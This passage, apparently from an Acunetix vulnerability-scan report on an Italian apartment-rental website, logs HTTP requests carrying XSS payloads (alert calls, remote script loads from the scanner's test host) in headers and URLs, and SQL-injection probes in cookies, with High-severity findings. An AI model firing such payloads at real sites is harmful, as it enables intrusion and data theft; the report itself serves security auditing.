User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: <img dynsrc="JaVaScRiPt:alert(403825641654);"> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html Acunetix Website Audit 15
  16. 16. /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: <ScRiPt src=http://testphp.acunetix.com/xss.js?403875641654></ScRiPt> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="403845641654"> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:33:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html Acunetix Website Audit 16
  17. 17. /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: <embed src="http://testphp.acunetix.com/xss.swf?403855641654" type="application/x-shockwave-flash"/> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: <META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(403835641654);"> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html Acunetix Website Audit 17
  18. 18. /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: <body onload=alert(403865641654)> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: javascript:alert(404275647468) Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:33:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request Acunetix Website Audit 18
  19. 19. GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: </xss/*-*/style=xss:e/**/xpression(alert(404265647468))> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:33:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: <ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?404035645206"></ScRiPt> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:33:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: Acunetix Website Audit 19
  20. 20. __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: <iframe/ /onload=alert(404395651541)></iframe> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:34:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: <img src=http://testphp.acunetix.com/dot.gif onload=alert(404005645206)> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:33:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Acunetix Website Audit 20
  21. 21. referer: <script/xss src=http://testphp.acunetix.com/xss.js?403995645206></script> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:33:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: <DIV STYLE="width:expression(alert(403805641654));"> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: <img src="JaVaScRiPt:alert(403655638337);"> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response Acunetix Website Audit 21
  22. 22. HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: <script>alert(403565638335)</script> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: < script>alert(403785641654);</script> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin Acunetix Website Audit 22
  23. 23. X-Powered-By: PHP/5.2.3 /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: <FRAMESET><FRAME SRC="JaVaScRiPt:alert(403815641654);"></FRAMESET> Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html Cross Site Scripting in URI Severity High Type Validation Reported by module File checks Description Impact Acunetix Website Audit 23
  24. 24. Recommendation Affected items /de/appartamento.php Details Request GET /de/appartamento.php?=>"'><ScRiPt>alert(428475928671)</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 20:14:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /de/appartamento.php Details Request GET /de/appartamento.php?>"'><ScRiPt>alert(428465928671)</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 20:14:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html Acunetix Website Audit 24
  25. 25. /de/appartamento.php Details Request GET /de/appartamento.php?acuparam=>'><ScRiPt>alert(428445928671)</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 20:14:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /de/appartamento.php Details Request GET /de/appartamento.php?acuparam=>"><ScRiPt>alert(428455928671)</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 20:14:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?acuparam=>'><ScRiPt>alert(427025915589)</ScRiPt> HTTP/1.0 Accept: */* Acunetix Website Audit 25
  26. 26. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 20:12:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?acuparam=>"><ScRiPt>alert(427035915589)</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 20:12:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?>"'><ScRiPt>alert(427045915589)</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix Website Audit 26
  27. 27. Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 20:12:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?=>"'><ScRiPt>alert(427055915589)</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 20:12:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html SQL injection Severity High Type Validation Reported by module Parameter manipulation Description Impact Acunetix Website Audit 27
  28. 28. Recommendation Affected items /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=acunetix'";__utmb=177195445%2E0%2E10%2E1266780517;__utmc=177195445;__utmz=1771954 45%2E1266780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28no ne%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=";__utmb=177195445%2E0%2E10%2E1266780517;__utmc=177195445;__utmz=177195445%2E126 6780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:06 GMT Server: Microsoft-IIS/6.0 Acunetix Website Audit 28
  29. 29. X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=';__utmb=177195445%2E0%2E10%2E1266780517;__utmc=177195445;__utmz=177195445%2E1266 780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=';__utmb=177195445%2E0%2E10%2E1266780517;__utmc=177195445;__utmz=177195445%2E126 6780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request Acunetix Website Audit 29
  30. 30. GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=%2527;__utmb=177195445%2E0%2E10%2E1266780517;__utmc=177195445;__utmz=177195445%2E 1266780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=%00';__utmb=177195445%2E0%2E10%2E1266780517;__utmc=177195445;__utmz=177195445%2E1 266780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: 